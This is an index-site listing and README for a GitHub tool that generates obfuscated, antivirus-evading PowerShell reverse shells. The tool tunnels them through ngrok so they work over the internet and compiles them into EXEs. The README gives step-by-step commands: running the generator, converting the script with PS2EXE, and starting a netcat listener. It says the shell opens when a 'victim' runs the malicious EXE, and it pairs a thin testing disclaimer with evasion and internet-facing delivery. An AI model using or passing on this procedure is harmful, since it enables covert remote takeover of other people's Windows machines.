Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/red-team-444/stealth-shell
This tool generates an undetectable Windows reverse shell PowerShell script. Users can configure IP and Port according to their requirements. The generated script is obfuscated to avoid detection by antivirus software.
https://github.com/red-team-444/stealth-shell
bypass-windows-defender bypasswindow10 malware ngrok offensive-security powershell ps2exe python3 redteam-tools reverse-shell windows-10
Last synced: 27 days ago
JSON representation
This tool generates an undetectable Windows reverse shell PowerShell script. Users can configure IP and Port according to their requirements. The generated script is obfuscated to avoid detection by antivirus software.
- Host: GitHub
- URL: https://github.com/red-team-444/stealth-shell
- Owner: RED-TEAM-444
- License: mit
- Created: 2024-07-10T09:19:16.000Z (4 months ago)
- Default Branch: main
- Last Pushed: 2024-07-16T19:18:25.000Z (4 months ago)
- Last Synced: 2024-10-11T14:03:57.006Z (27 days ago)
- Topics: bypass-windows-defender, bypasswindow10, malware, ngrok, offensive-security, powershell, ps2exe, python3, redteam-tools, reverse-shell, windows-10
- Language: Python
- Homepage:
- Size: 61.5 KB
- Stars: 6
- Watchers: 1
- Forks: 4
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
- License: LICENSE
Awesome Lists containing this project
README
# Stealth Shell
## Introduction
The PowerShell Reverse Shell Generator Tool is designed to facilitate the creation of customizable, undetectable PowerShell scripts for establishing reverse shells on Windows systems. This tool allows security professionals and penetration testers to generate scripts that can be used for remote access and management in controlled environments.## Features
- **Dynamic Configuration:** Users can specify IP addresses and ports to customize generated scripts.
- **Obfuscation Techniques:** Built-in support for obfuscation to evade antivirus detection.
- **Integration with ngrok:** Uses Ngrok for tunneling, allowing reverse shell access over the internet.
- **Cross-Platform Compatibility:** Python-based tool compatible with various operating systems.
## Usage
This project devided into two parts:- **Local Host:** Tested between your virtual Machine and get reverse shell of your Virtual Windows, this is only for testing.
- **Ngrok Reverse Shell:** Here You will generate the reverse shell that intergrate with ngrok and get reverse shell over the internet.## How To Use
- Clone the repository
```
git clone https://github.com/RED-TEAM-444/STEALTH-SHELL.git
```- Now go to cloned directory
```
V2-Ngrok
```- Setup Ngrok
#### Detailed Implementation
- Install ngrok
- Download ngrok from ngrok's official website.
- Unzip and move the binary to a directory included in your system’s PATH (e.g., /usr/local/bin).- Authenticate ngrok
- Sign up for an ngrok account to get an authentication token.
- Authenticate ngrok on your machine using:
```
ngrok authtoken YOUR_AUTH_TOKEN
```
- Run the Script```
python3 main.py -p 4444
```![WhatsApp Image 2024-07-14 at 11 55 36 PM](https://github.com/user-attachments/assets/64e6e9b8-2c06-4563-b214-44d56050bfcd)
- Save the output```
Save the Obfuscated output in .ps1 file.
Example: reverse_shell.ps1
```
- Transfer the ```.ps1``` file into your Virtual Windows to convert it into executable form ```EXE```.- Install Win-PS2EXE.exe file in your Windows Machine from below methods and open it:
- Directly download it from my repository
- from here ``` https://github.com/MScholtes/TechNet-Gallery/blob/master/PS2EXE-GUI/Win-PS2EXE.exe```![ps2exe](https://github.com/user-attachments/assets/c3a94ed7-f76c-4f2a-b1f4-7eb1f5f5a26a)
- Now Compile the ```reverse_shell.ps1``` into ```reverse_shell.exe```- Open Win-PS2EXE.
- Select the ```.ps1``` file in Source file that we will going to convert in ```EXE```.
- Now, Select the target where you want to save the compile ```EXE``` file according to your choice.- At last, compile it and you will get the EXE file that gonna use to generate reverse shell.
![ps2exe1](https://github.com/user-attachments/assets/05e4f63f-cd04-49e4-928c-9de57ab80534)
- Start Netcat Listener on your Kali Machine
nc -lvp 4444- As soon as Victim trying to open our generated malicious reverse shell ```EXE``` file it will generate the reverse shell on your Kali Machine.
## Requirements
- Python 3.x
- requests
- Python 3 and Pip## Install Dependencies
- Install Required Python Packages
```
sudo pip3 install requests
```
- Install Python 3 and Pip
```
sudo apt install python3 python3-pip -y
```## Understand Working Structure through diagram
![diagram ](https://github.com/user-attachments/assets/d9334e73-e004-4301-b612-319f7ede06fd)